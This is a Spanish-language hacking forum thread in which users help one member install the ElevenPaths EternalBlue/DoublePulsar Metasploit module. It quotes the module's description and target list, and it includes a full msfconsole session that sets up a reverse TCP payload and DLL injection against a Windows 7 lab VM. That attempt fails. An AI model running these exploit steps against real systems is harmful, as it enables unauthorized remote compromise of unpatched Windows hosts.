saludos:
he descargado el exploit eternalblue_doblepulsar de github, lo he metido en esta ruta
/root/.msf4/modules/exploits/local/windows/eternalblue (esta es la carpeta descargada que la he renombrado a eternalblue no se si he hecho mal.....)
las carpetas "exploits local y windows" las he creado yo para llevar un poco de orden......el caso es que dentro de dicha carpeta esta tambien la carpeta
"deps" y mi pregunta es si esa es la ubicacion correcta ?
Mirate este link:
http://foro.elhacker.net/bugs_y_exploits/vulnerar_windows_7_con_eternalblue_doublepulsar-t471204.0.html
El modulo oficial de metasploit es el siguiente https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
, si tienes tu equipo con las actualizaciones al día ya deberias de tenerlo
Saludos,
El modulo oficial solo sirve para windows7 y windows 8 server. El del github sirve para todas las versiones. Por eso se desea instalar la versión de elevenPaths.
@animanegra (https://underc0de.org/foro/profile/animanegra/), no, el exploit de ElevenPahts no funciona en Windows 10:
Cita de: eternalblue_doublepulsar.rb'Description' => %q{
This module exploits a vulnerability on SMBv1/SMBv2 protocols through Eternalblue.
After that, doublepulsar is used to inject remotely a malicious dll (it's will generate based on your payload selection).
You can use this module to compromise a host remotely (among the targets available) without needing nor authentication neither target's user interaction.
** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, IT'S NOT THE FULL PORTATION **
},
'Author' =>
[
'Pablo Gonzalez (@pablogonzalezpe)',
'Sheila A. Berta (@UnaPibaGeek)'
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'DefaultTarget' => 8,
'Targets' =>
[
['Windows XP (all services pack) (x86) (x64)',{}],
['Windows Server 2003 SP0 (x86)',{}],
['Windows Server 2003 SP1/SP2 (x86)',{}],
['Windows Server 2003 (x64)',{}],
['Windows Vista (x86)',{}],
['Windows Vista (x64)',{}],
['Windows Server 2008 (x86) ',{}],
['Windows Server 2008 R2 (x86) (x64)',{}],
['Windows 7 (all services pack) (x86) (x64)',{}]
],
De todas formas ya se ha portado el exploit para Win 10, aquí dejo el paper oficial: No tienes permitido ver enlaces.
Registrate o
Entra a tu cuenta
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
El modulo oficial solo sirve para windows7 y windows 8 server. El del github sirve para todas las versiones. Por eso se desea instalar la versión de elevenPaths.
Windows 8 server? ??? ???
Sirve hasta para windows 7 y Windows Server 2008 el de ElevenPaths y hay otro por ahi que sirve para win 8 y windows server 2012 pero no tiene integracion con metasploit (No hay modulo)
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
@animanegra (https://underc0de.org/foro/profile/animanegra/), no, el exploit de ElevenPahts no funciona en Windows 10:
Antes muerto que admitir que windows 10 es un windows!!!!!!!
:P Nas, no sabia que no iba en win 10, pero si que es cierto que abre el espectro de versiones notablemente.
Solo vean esto y ya.
(https://doaid32yamkmw.cloudfront.net/media/images/eternal-blue-nopsec.width-800.png)
no se si abrir otro post..... pero como va de lo mismo.....
hago todo esto pero no funciona
=[ metasploit v4.14.22-dev ]
+ -- --=[ 1660 exploits - 947 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf> use windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set eternalbluepath /root/Desktop/eternalblue/deps/
eternalbluepath => /root/Desktop/eternalblue/deps/
msf exploit(eternalblue_doublepulsar) > set doublepulsarpath /root/Desktop/eternalblue/deps/
doublepulsarpath => /root/Desktop/eternalblue/deps/
msf exploit(eternalblue_doublepulsar) > set targetarchitecture x86
targetarchitecture => x86
msf exploit(eternalblue_doublepulsar) > set process inject wlms.exe
process => inject wlms.exe
msf exploit(eternalblue_doublepulsar) > set lhost 192.168.0.193
lhost => 192.168.0.193
msf exploit(eternalblue_doublepulsar) > set lport 8008
lport => 8008
msf exploit(eternalblue_doublepulsar) > set rhost 192.168.0.194
rhost => 192.168.0.194
msf exploit(eternalblue_doublepulsar) > set winepath /root/.wine/drive_c/
winepath => /root/.wine/drive_c/
msf exploit(eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.0.193:8008
[*] 192.168.0.194:445 - Generating Eternalblue XML data
[*] 192.168.0.194:445 - Generating Doublepulsar XML data
[*] 192.168.0.194:445 - Generating payload DLL for Doublepulsar
[*] 192.168.0.194:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.0.194:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.0.194:445 - Are you sure it's vulnerable?
[*] 192.168.0.194:445 - Launching Doublepulsar...
[-] 192.168.0.194:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(eternalblue_doublepulsar) >
por descontado que el puerto esta abierto a la ip 192.168.0.193
el w7 es ultimate 32bits y tanto kali como w7 corren en vbox en la mima red kali 2016.2
w7 ip 192.168.0.194
kali ip 192.168.0.193 con el puerto 8008 abierto en el router
Hola.
@redferne (https://underc0de.org/foro/index.php?action=profile;u=52477)Mira este vídeo. Explican como instalar eternal blue y como se explota